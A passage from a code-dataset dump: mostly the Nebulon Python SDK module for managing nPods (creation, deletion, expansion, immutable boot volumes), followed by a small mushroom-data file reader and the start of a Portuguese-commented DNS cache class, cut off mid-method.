created\"\"\"\n return self.__creation_time\n\n @property\n def recommended_package(self) -> NPodRecommendedPackage:\n \"\"\"Unique identifier for the nPod template used during nPod creation\"\"\"\n return self.__recommended_package\n \n @property\n def immutable_boot_volumes(self) -> bool:\n \"\"\"If immmutable boot is enabled on nebulon nPod\"\"\"\n return self.__immutable_boot_volumes\n\n @property\n def immutable_boot_volumes_note(self) -> str:\n \"\"\"A note regarding immutable boot volumes\"\"\"\n return self.__immutable_boot_volumes_note\n\n @property\n def immutable_boot_volumes_snapshot_time(self) -> datetime:\n \"\"\"\n Point in time at which the immutable boot volume feature was turned on.\n \"\"\"\n return self.__immutable_boot_volumes_snapshot_time\n\n @staticmethod\n def fields():\n return [\n \"uuid\",\n \"name\",\n \"note\",\n \"nPodGroup{uuid}\",\n \"volumes{uuid}\",\n \"volumeCount\",\n \"hosts{uuid}\",\n \"hostCount\",\n \"spus{serial}\",\n \"spuCount\",\n \"snapshots{uuid}\",\n \"updateHistory{%s}\" % \",\".join(UpdateHistory.fields()),\n \"nPodTemplate{uuid}\"\n \"creationTime\",\n \"recommendedPackage{%s}\" % \",\".join(NPodRecommendedPackage.fields()),\n \"immutableBootVolumes\",\n \"immutableBootVolumesNote\",\n \"immutableBootVolumesSnapshotTime\",\n ]\n\n\nclass NPodList:\n \"\"\"Paginated nPod list object\n\n Contains a list of nPod objects and information for\n pagination. By default a single page includes a maximum of ``100`` items\n unless specified otherwise in the paginated query.\n\n Consumers should always check for the property ``more`` as per default\n the server does not return the full list of alerts but only one page.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new nPod list object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__items = read_value(\n \"items\", response, NPod, True)\n self.__more = read_value(\n \"more\", response, bool, True)\n self.__total_count = read_value(\n \"totalCount\", response, int, True)\n self.__filtered_count = read_value(\n \"filteredCount\", response, int, True)\n\n @property\n def items(self) -> list:\n \"\"\"List of nPods in the pagination list\"\"\"\n return self.__items\n\n @property\n def more(self) -> bool:\n \"\"\"Indicates if there are more items on the server\"\"\"\n return self.__more\n\n @property\n def total_count(self) -> int:\n \"\"\"The total number of items on the server\"\"\"\n return self.__total_count\n\n @property\n def filtered_count(self) -> int:\n \"\"\"The number of items on the server matching the provided filter\"\"\"\n return self.__filtered_count\n\n @staticmethod\n def fields():\n return [\n \"items{%s}\" % \",\".join(NPod.fields()),\n \"more\",\n \"totalCount\",\n \"filteredCount\",\n ]\n\n\nclass NPodCustomDiagnostic:\n \"\"\"Defines a custom diagnostics script\n\n Custom diagnostics scripts are used by nebulon customer satisfaction when\n custom commands and diagnostics scripts need to be executed on SPUs in\n customers datacenters to resolve issues.\n\n Commands cannot be executed without customer approval as they need to be\n approved and authenticated through the security triangle. 
Custom diagnostics\n scripts are the vehicle that facilitates this approval process.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new NPodCustomDiagnostic object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__request_uuid = read_value(\n \"requestUID\", response, str, False)\n self.__diagnostic_name = read_value(\n \"diagnosticName\", response, str, False)\n self.__npod_uuid = read_value(\n \"podUID\", response, str, False)\n self.__once_only = read_value(\n \"onceOnly\", response, bool, False)\n self.__note = read_value(\n \"note\", response, str, False)\n\n @property\n def request_uuid(self) -> str:\n \"\"\"Unique identifier for the diagnostic script\"\"\"\n return self.__request_uuid\n\n @property\n def diagnostic_name(self) -> str:\n \"\"\"Human readable name for the diagnostic script\"\"\"\n return self.__diagnostic_name\n\n @property\n def npod_uuid(self) -> str:\n \"\"\"Unique identifier of the nPod on which the script should run\"\"\"\n return self.__npod_uuid\n\n @property\n def once_only(self) -> bool:\n \"\"\"Indicates that the script will only be executed once\"\"\"\n return self.__once_only\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the diagnostics script\"\"\"\n return self.__note\n\n @staticmethod\n def fields():\n return [\n \"requestUID\",\n \"diagnosticName\",\n \"podUID\",\n \"onceOnly\",\n \"note\",\n ]\n\n\nclass ExpectedNPodCapacity:\n \"\"\"Describes information for nPods that are about to be created\n\n Allows predicting the storage configuration of an nPod before its\n creation.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new ExpectedNPodCapacity object\n\n This constructor expects a ``dict`` object from the nebulon ON API.
It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__total_pd_capacity_blk = read_value(\n \"totalPDCapacityBlk\", response, int, False)\n self.__total_raw_capacity_blk = read_value(\n \"totalRawCapacityBlk\", response, int, False)\n self.__total_user_data_capacity_blk = read_value(\n \"totalUserDataCapacityBlk\", response, int, False)\n self.__template_saving_factor = read_value(\n \"templateSavingFactor\", response, float, False)\n self.__total_presented_capacity = read_value(\n \"totalPresentedCapacity\", response, int, False)\n self.__total_vv_count = read_value(\n \"totalVVCount\", response, int, False)\n # SPU capacity information is omitted on purpose\n # self.__spus_capacity_info = read_value(\n # \"spusCapInfo\", response, SPUCapInfo, True)\n\n @property\n def total_pd_capacity_blk(self) -> int:\n \"\"\"Total physical drive capacity in blocks (512 bytes)\"\"\"\n return self.__total_pd_capacity_blk\n\n @property\n def total_raw_capacity_blk(self) -> int:\n \"\"\"Total raw capacity in blocks (512 bytes)\"\"\"\n return self.__total_raw_capacity_blk\n\n @property\n def total_user_data_capacity_blk(self) -> int:\n \"\"\"Total usable capacity in blocks (512 bytes)\"\"\"\n return self.__total_user_data_capacity_blk\n\n @property\n def template_saving_factor(self) -> float:\n \"\"\"Savings factor used for the calculation, provided by the template\"\"\"\n return self.__template_saving_factor\n\n @property\n def total_presented_capacity(self) -> int:\n \"\"\"Total capacity presented to hosts\"\"\"\n return self.__total_presented_capacity\n\n @property\n def total_vv_count(self) -> int:\n \"\"\"Total number of volumes that will be created\"\"\"\n return self.__total_vv_count\n\n @staticmethod\n def fields():\n return [\n \"totalPDCapacityBlk\",\n \"totalRawCapacityBlk\",\n \"totalUserDataCapacityBlk\",\n \"templateSavingFactor\",\n \"totalPresentedCapacity\",\n \"totalVVCount\",\n ]\n\n\nclass UpdateNPodMembersInput:\n \"\"\"An input object to update (expand) an existing nPod.\n\n The update nPod members operation is used to expand an existing nPod with\n the given input services processing units (SPUs).\n \"\"\"\n\n def __init__(\n self,\n add_spus: List[NPodSpuInput]\n ):\n \"\"\"Constructs a new input object to update an nPod\n\n The update nPod members operation is used to expand the existing nPod\n with the given services processing units.\n\n :param add_spus: A list of input SPUs to expand the nPod.\n :type add_spus: List[NPodSpuInput]\n \"\"\"\n self.__add_spus = add_spus\n\n @property\n def add_spus(self) -> List[NPodSpuInput]:\n \"\"\"The list of SPUs to expand the nPod\"\"\"\n return self.__add_spus\n\n @property\n def as_dict(self):\n result = dict()\n result[\"addSPUs\"] = self.add_spus\n return result
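\n\n\n# --- Illustrative usage sketch (added here for clarity; not part of the\n# original SDK source). Builds the input for expanding an nPod by one SPU and\n# passes it to ``update_npod_members`` (defined on NPodsMixin below). The SPU\n# serial number, SPU name, and ``client`` object are placeholders; ``client``\n# is assumed to be any object that includes NPodsMixin.\ndef _example_expand_npod(client, npod_uuid: str):\n new_member = NPodSpuInput(\n spu_serial=\"0123456789ABCDEF\", # hypothetical SPU serial\n spu_name=\"rack2-server5\"\n )\n return client.update_npod_members(\n uuid=npod_uuid,\n update_npod_members_input=UpdateNPodMembersInput(add_spus=[new_member])\n )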
\n\n\nclass UpdateImmutableBootInput:\n \"\"\"An input object to update an nPod's immutable boot volumes\"\"\"\n def __init__(\n self,\n enable: bool,\n snapshot_on_host_reboot: bool = None,\n note: str = None,\n preserve_snapshots: bool = None,\n ) -> None:\n \"\"\"\n Constructs a new input object to update an nPod's immutable boot volumes\n :param enable: Enables or disables immutable boot volumes.\n :type enable: bool\n :param snapshot_on_host_reboot: When enabling immutable boot volumes,\n wait until the next host reboot to actually take the snapshot.\n May only be specified while enabling. Defaults to ``True``.\n :type snapshot_on_host_reboot: bool\n :param note: Sets a note regarding immutable boot volumes.\n May only be specified while enabling.\n :type note: str\n :param preserve_snapshots: When disabling immutable boot volumes, retain\n the snapshots of their immutable image. The snapshots then become\n normal snapshots and may be deleted. May only be specified when\n disabling.\n :type preserve_snapshots: bool\n \"\"\"\n self.__enable = enable\n self.__snapshot_on_host_reboot = snapshot_on_host_reboot\n self.__note = note\n self.__preserve_snapshots = preserve_snapshots\n\n @property\n def enable(self) -> bool:\n \"\"\"Enables or disables immutable boot volumes\"\"\"\n return self.__enable\n\n @property\n def snapshot_on_host_reboot(self) -> bool:\n \"\"\"\n When enabling immutable boot volumes, wait until the next host reboot\n to actually take the snapshot. May only be specified while enabling.\n Defaults to ``True``.\n \"\"\"\n return self.__snapshot_on_host_reboot\n\n @property\n def note(self) -> str:\n \"\"\"A note regarding immutable boot volumes. May only be specified while enabling.\"\"\"\n return self.__note\n\n @property\n def preserve_snapshots(self) -> bool:\n \"\"\"\n When disabling immutable boot volumes, retain the snapshots of their\n immutable image. The snapshots then become normal snapshots and may be\n deleted. May only be specified when disabling.\n \"\"\"\n return self.__preserve_snapshots\n\n @property\n def as_dict(self):\n result = dict()\n result[\"enable\"] = self.enable\n result[\"snapshotOnHostReboot\"] = self.snapshot_on_host_reboot\n result[\"note\"] = self.note\n result[\"preserveSnapshots\"] = self.preserve_snapshots\n return result\n\n\nclass UpdateNPodTokenInput:\n \"\"\"An input object to update an nPod\n \"\"\"\n def __init__(\n self,\n immutable_boot_volumes_input: UpdateImmutableBootInput,\n ):\n \"\"\"\n Constructs a new input object to update an nPod\n :param immutable_boot_volumes_input: Enables or disables immutable boot volumes.\n :type immutable_boot_volumes_input: UpdateImmutableBootInput\n \"\"\"\n self.__immutable_boot_volumes_input = immutable_boot_volumes_input\n\n @property\n def immutable_boot_volumes(self) -> UpdateImmutableBootInput:\n \"\"\"Enables or disables immutable boot volumes\"\"\"\n return self.__immutable_boot_volumes_input\n\n @property\n def as_dict(self):\n result = dict()\n result[\"immutableBootVolumes\"] = self.immutable_boot_volumes\n return result
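\n\n\n# --- Illustrative usage sketch (added here for clarity; not part of the\n# original SDK source). Shows the input object used to enable immutable boot\n# volumes, deferring the protecting snapshot to the next host reboot, and\n# passes it to ``update_npod_immutable_boot`` (defined on NPodsMixin below).\n# The ``client`` argument is assumed to be any object that includes NPodsMixin.\ndef _example_enable_immutable_boot(client, npod_uuid: str):\n boot_input = UpdateImmutableBootInput(\n enable=True,\n snapshot_on_host_reboot=True,\n note=\"enabled during maintenance window\" # hypothetical note\n )\n return client.update_npod_immutable_boot(\n uuid=npod_uuid,\n immutable_boot_volumes_input=boot_input\n )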
\n\n\nclass NPodsMixin(NebMixin):\n \"\"\"Mixin to add nPod related methods to the GraphQL client\"\"\"\n\n def get_npods(\n self,\n page: PageInput = None,\n npod_filter: NPodFilter = None,\n sort: NPodSort = None\n ) -> NPodList:\n \"\"\"Retrieve a list of provisioned nPods\n\n :param page: The requested page from the server. This is an optional\n argument and if omitted the server will default to returning the\n first page with a maximum of ``100`` items.\n :type page: PageInput, optional\n :param npod_filter: A filter object to filter the nPods on the\n server. If omitted, the server will return all objects as a\n paginated response.\n :type npod_filter: NPodFilter, optional\n :param sort: A sort definition object to sort the nPod objects\n on supported properties. If omitted, objects are returned in the\n order in which they were created.\n :type sort: NPodSort, optional\n\n :returns NPodList: A paginated list of nPods.\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"page\"] = GraphQLParam(\n page, \"PageInput\", False)\n parameters[\"filter\"] = GraphQLParam(\n npod_filter, \"NPodFilter\", False)\n parameters[\"sort\"] = GraphQLParam(\n sort, \"NPodSort\", False)\n\n # make the request\n response = self._query(\n name=\"getNPods\",\n params=parameters,\n fields=NPodList.fields()\n )\n\n # convert to object\n return NPodList(response)\n\n def __get_new_pod_issues(\n self,\n spus: List[NPodSpuInput]\n ) -> Issues:\n \"\"\"Internal method that checks for issues during nPod creation\n\n :param spus: List of SPU configurations that will be used for the new\n nPod\n :type spus: List[NPodSpuInput], optional\n :returns Issues: An object describing any warnings or errors that were\n detected during nPod creation pre-flight checks.\n \"\"\"\n\n # current API expects a list of SPU serial numbers\n spu_serials = [i.spu_serial for i in spus]\n\n # setup query parameters\n parameters = dict()\n parameters[\"spuSerials\"] = GraphQLParam(\n spu_serials,\n \"[String!]\",\n True\n )\n\n # make the request\n response = self._query(\n name=\"newPodIssues\",\n params=parameters,\n fields=Issues.fields()\n )\n\n # convert to object\n return Issues(response)
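\n\n # --- Illustrative helper (added here for clarity; not part of the\n # original SDK source). Iterates over all nPods page by page using the\n # ``more`` flag of the paginated response, per the NPodList documentation\n # above. ``PageInput(page=...)`` is assumed to accept a page number, and\n # page numbering is assumed to start at 1.\n def _example_list_all_npods(self):\n npods = []\n page_number = 1\n while True:\n npod_list = self.get_npods(page=PageInput(page=page_number))\n npods.extend(npod_list.items)\n if not npod_list.more:\n # the server reports no further pages\n break\n page_number += 1\n return npods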
\n\n def create_npod(\n self,\n create_npod_input: CreateNPodInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\"Allows creation of a new nPod\n\n A nPod is a collection of network-connected application servers with\n SPUs installed that form an application cluster. Together, the SPUs in\n a nPod serve shared or local storage to the servers in the application\n cluster, e.g. a hypervisor cluster, container platform, or clustered\n bare metal application.\n\n :param create_npod_input: A parameter describing the properties of the\n new nPod.\n :type create_npod_input: CreateNPodInput\n :param ignore_warnings: If specified and set to ``True`` the nPod\n creation will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the nPod creation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :returns NPod: The new nPod\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the nPod creation times out.\n \"\"\"\n\n # check for potential issues that nebulon ON predicts\n issues = self.__get_new_pod_issues(spus=create_npod_input.spus)\n issues.assert_no_issues(ignore_warnings=ignore_warnings)\n\n # setup query parameters for npod creation\n parameters = dict()\n parameters[\"input\"] = GraphQLParam(\n create_npod_input,\n \"CreateNPodInput\",\n True\n )\n\n # make the request\n mutation_name = \"createNPod\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None\n\n def delete_npod(\n self,\n uuid: str,\n secure_erase: bool = False,\n ignore_warnings: bool = False,\n ):\n \"\"\"Delete an existing nPod\n\n Deletes an nPod and erases all stored data. During nPod deletion the\n configuration of SPUs in an nPod is wiped and data encryption keys are\n erased. This renders all data in the nPod unrecoverable. This operation\n is irreversible.\n\n > [!NOTE]\n > This is a non-blocking call and does not wait until the delete\n > operation is complete. SPUs may not be accessible immediately after\n > the deletion.\n\n Optionally, users can make use of the ``secure_erase`` parameter that\n will trigger a secure erase of every SSD in the nPod. This uses\n manufacturer-specific software to securely delete all data on drives\n without damaging them or expediting wear. Secure erase will require\n several minutes to complete.\n\n All data is encrypted before it is written to the backend drives, and\n deleting the disk encryption key during the nPod deletion makes all data\n permanently and irreversibly unreadable. The secure erase functionality\n is only provided to support organizational processes.\n\n > [!IMPORTANT]\n > This operation will permanently erase data and the data cannot be\n > recovered. Use this method with caution.\n\n :param uuid: The unique identifier of the nPod to delete.\n :type uuid: str\n :param secure_erase: Forces a secure wipe of the nPod. While this is not\n required as nPod deletion will destroy the encryption keys and\n render data unreadable, it allows explicitly overwriting data on\n server SSDs. Only use this flag when decommissioning storage, as the\n secure erase procedure will take some time.\n :type secure_erase: bool, optional\n :param ignore_warnings: If specified and set to ``True`` the operation\n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings.
Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"uid\"] = GraphQLParam(\n uuid,\n \"String\",\n True\n )\n parameters[\"secureErase\"] = GraphQLParam(\n secure_erase,\n \"Boolean\",\n False\n )\n\n # make the request\n response = self._mutation(\n name=\"delPod\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n # TODO: Implement recipe engine v2 that waits for SPU availability\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n\n def set_npod_timezone(\n self,\n uuid: str,\n set_npod_timezone_input: SetNPodTimeZoneInput,\n ignore_warnings: bool = False,\n ):\n \"\"\"Allows setting the timezone for all SPUs in an nPod\n\n :param uuid: The unique identifier of the nPod that is being modified.\n :type uuid: str\n :param set_npod_timezone_input: A parameter describing the timezone\n information that shall be applied to the SPUs in the nPod.\n :type set_npod_timezone_input: SetNPodTimeZoneInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid, \"UUID\", True)\n parameters[\"input\"] = GraphQLParam(\n set_npod_timezone_input,\n \"SetNPodTimeZoneInput\",\n True\n )\n\n # make the request\n response = self._mutation(\n name=\"setNPodTimeZone\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n\n def collect_debug_info(\n self,\n debug_info_input: DebugInfoInput,\n ignore_warnings: bool = False,\n ):\n \"\"\"Allows sending verbose diagnostic information to nebulon ON\n\n In cases where more in-depth diagnostic information is required to\n resolve customer issues, this method allows capturing and uploading\n verbose diagnostic information.\n\n :param debug_info_input: A parameter that describes what information to\n collect from which infrastructure.\n :type debug_info_input: DebugInfoInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. 
Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"input\"] = GraphQLParam(\n debug_info_input,\n \"DebugInfoInput\",\n True\n )\n\n # make the request\n response = self._mutation(\n name=\"collectDebugInfo\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n\n def update_npod_members(\n self,\n uuid: str,\n update_npod_members_input: UpdateNPodMembersInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\"Allows expanding an existing nPod with additional SPUs\n\n The update nPod members operation is used to expand the existing nPod\n (identified by ``uuid``) with the services processing units (SPUs)\n specified in the provided input object.\n\n :param uuid: The unique identifier of the nPod to update.\n :type uuid: str\n :param update_npod_members_input: An input object describing the\n parameters for updating the nPod\n :type update_npod_members_input: UpdateNPodMembersInput\n :param ignore_warnings: If specified and set to ``True`` the operation\n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :returns NPod: The updated nPod\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the update nPod members operation times out.\n \"\"\"\n\n # setup mutation parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid,\n \"UUID\",\n True\n )\n parameters[\"input\"] = GraphQLParam(\n update_npod_members_input,\n \"UpdateNPodMembersInput\",\n True\n )\n\n # make the request\n mutation_name = \"updateNPodMembers\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None\n\n def update_npod_immutable_boot(\n self,\n uuid: str,\n immutable_boot_volumes_input: UpdateImmutableBootInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\"Allows enabling or disabling immutable boot volumes on an nPod\n\n :param uuid: The unique identifier of the nPod to update.\n :type uuid: str\n :param immutable_boot_volumes_input: Enables or disables immutable boot\n volumes.\n :type immutable_boot_volumes_input: UpdateImmutableBootInput\n :param ignore_warnings: If specified and set to ``True`` the operation\n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings.
Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n\n :returns NPod: The nPod to witch the token was sent\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the update nPod members times out.\n \"\"\"\n # setup mutation parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid,\n \"UUID\",\n True\n )\n update_npod_token_input = UpdateNPodTokenInput(\n immutable_boot_volumes_input=immutable_boot_volumes_input\n )\n parameters[\"input\"] = GraphQLParam(\n update_npod_token_input,\n \"UpdateNPodTokenInput\",\n True\n )\n\n # make the request\n mutation_name = \"updateNPodToken\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None","repo_name":"Nebulon/nebpyclient","sub_path":"nebpyclient/api/npods.py","file_name":"npods.py","file_ext":"py","file_size_in_byte":73636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"38680429372","text":"import numpy as np\r\n\r\ndef to_array(str):\r\n arr = np.array([])\r\n memory = \"\"\r\n for c in str:\r\n if c == \",\":\r\n arr = np.append(arr, memory)\r\n memory = \"\"\r\n else:\r\n memory += c\r\n if memory != \"\":\r\n arr = np.append(arr, memory)\r\n return arr\r\n\r\ndef main():\r\n arr = []\r\n f = open(\"mushrooms_data.txt\", \"r\")\r\n # print(f.read())\r\n for line in f:\r\n stripped_line = line.strip()\r\n arr.append(to_array(stripped_line))\r\n return arr\r\n\r\ndef missing():\r\n arr = []\r\n f = open(\"mushrooms_data_missing.txt\", \"r\")\r\n # print(f.read())\r\n i = 0\r\n for line in f:\r\n stripped_line = line.strip()\r\n arr.append(to_array(stripped_line))\r\n return arr","repo_name":"ElyasafHadassi/machine","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"647358653","text":"class _CacheEntry:\n \"\"\"\n Esta classe privada implementa uma entrada da cache.\n \"\"\"\n type_of_value_from_int = ('SOASP','SOAADMIN','SOASERIAL','SOAREFRESH','SOARETRY','SOAEXPIRE',\n 'NS','A','CNAME','MX','PTR')\n int_from_type_of_value = {'SOASP': 0, 'SOAADMIN': 1, 'SOASERIAL': 2, 'SOAREFRESH': 3, 'SOARETRY': 4,\n 'SOAEXPIRE': 5, 'NS': 6, 'A': 7, 'CNAME': 8, 'MX': 9, 'PTR': 10}\n origin_from_int = ('FILE','SP','OTHERS')\n def __init__(self, name: str, type_of_value: int, value, ttl: int, priority: int, origin,\n timestamp: int,index: int, status: int) -> None:\n self.name = name\n self.type_of_value = type_of_value\n self.value = value\n self.ttl = ttl\n self.priority = priority\n self.origin = origin # File->0, SP->1, OTHERS->2\n self.timestamp = timestamp\n self.index = index\n 
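The `to_array` helper in the `file_reader.py` entry above re-implements comma splitting character by character, keeping interior empty fields but silently dropping a trailing one. A minimal sketch of the same behavior with `str.split`, assuming the same stripped-line input:

```python
import numpy as np

def to_array(line: str) -> np.ndarray:
    """Split a comma-separated line into an array of string fields.

    Mirrors the character loop in file_reader.py: interior empty fields
    are kept, but a single trailing empty field (from a trailing comma)
    is dropped.
    """
    fields = line.split(",")
    if fields and fields[-1] == "":
        fields.pop()
    return np.array(fields)

print(to_array("a,b,c"))  # ['a' 'b' 'c']
print(to_array("a,,c,"))  # ['a' '' 'c'] -- the trailing comma adds nothing
```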
self.status = status # 0 = FREE, 1 = VALID\n\n def __str__(self) -> str:\n status = 'FREE' if self.status == 0 else 'VALID'\n return f'{self.name} {_CacheEntry.type_of_value_from_int[self.type_of_value]} {self.value} {self.ttl} {self.priority} {_CacheEntry.origin_from_int[self.origin]} {self.timestamp} {self.index} {status}'\n \n def passTimeEntry(self) -> None:\n \"\"\"\n Esta função avança 1 segundo no tempo desta entrada.\n \"\"\"\n self.ttl -= 1\n self.status = 1 if self.ttl > 0 else 0\n\n def changeData(self, name, type_of_value, value, ttl, priority, origin,\n timestamp) -> None:\n \"\"\"\n Esta função actualiza o valor da entrada.\n \"\"\"\n self.name = name\n self.type_of_value = type_of_value\n self.value = value\n self.ttl = ttl\n self.priority = priority\n self.origin = origin\n self.timestamp = timestamp\n self.status = 1\n\n\nclass Cache:\n\n # NAME | TYPE-OF-VALUE | VALUE | TTL | PRIORITY | ORIGIN (FILE,SP,OTHERS) |\n # TEMPO DESDE QUE O SERVIDOR ARRANCOU ATÉ INSERIR A ENTRADA\n # INDEX ([1,N]) | STATUS (FREE:0 OR VALID:1)\n\n def __init__(self) -> None:\n self.timestamp = 0 # em segundos\n self.entries = list([_CacheEntry('',-1,None,0,-1,None,0,1,0)])\n self.N = 1\n \n def __str__(self) -> str:\n res = ''\n for entry in self.entries:\n res += f'{str(entry)}\\n'\n return res\n\n def passTime(self) -> None:\n \"\"\"\n Esta função avança 1 segundo na cache.\n \"\"\"\n self.timestamp += 1\n for entry in self.entries:\n entry.passTimeEntry()\n\n def _findFreeEntry(self) -> int:\n \"\"\"\n Esta fun��ão devolve o índice da primeira entrada da tabela da cache com estado 'FREE'.\n Se não houver entradas livres, devolve -1.\n \"\"\"\n for i in range(self.N):\n if self.entries[i].status == 0:\n return i\n\n return -1\n\n def _isFull(self) -> bool:\n \"\"\"\n Esta função verifica se a cache está cheia, ou seja, todas as entradas têm status 'VALID'.\n \"\"\"\n result = True\n for entry in self.entries:\n if entry.status == 0:\n result = False\n break\n return result\n\n def addEntry(self,name: str, type_of_value, value, ttl: int, priority: int, origin):\n \"\"\"\n Este método adiciona uma entrada na cache.\n \"\"\"\n if self._isFull():\n self.N += 1\n self.entries.append(_CacheEntry(name,type_of_value,value,ttl,priority,origin,self.timestamp,self.N,1))\n else:\n p = self._findFreeEntry()\n self.entries[p].changeData(name,type_of_value,value,ttl,priority,origin,self.timestamp)\n \n def existsDomain(self,domain: str):\n \"\"\"\n Esta função verifica se existe nesta cache um certo domínio/nome.\n \"\"\"\n for entry in self.entries:\n if entry.status == 1 and entry.name == domain:\n return True\n\n return False\n\n def responseCode1(self, name:str,type_of_value: int):\n aux = [x for x in self.entries if (x.status == 1) and (x.type_of_value == type_of_value)]\n aux = set(map(lambda e: e.name,aux))\n return self.existsDomain(name) and (name not in aux)\n\n def responseCode2(self, name:str):\n return not self.existsDomain(name)\n\n\n def __getResponseValues(self,name: str, type_of_value: str):\n \"\"\"\n Esta função devolve os response values de uma query.\n \"\"\"\n int_from_type_of_value = {'SOASP': 0, 'SOAADMIN': 1, 'SOASERIAL': 2, 'SOAREFRESH': 3, 'SOARETRY': 4,\n 'SOAEXPIRE': 5, 'NS': 6, 'A': 7, 'CNAME': 8, 'MX': 9, 'PTR': 10}\n type_of_value_from_int = ('SOASP','SOAADMIN','SOASERIAL','SOAREFRESH','SOARETRY','SOAEXPIRE',\n 'NS','A','CNAME','MX','PTR')\n\n result = []\n for entry in self.entries:\n if (entry.name 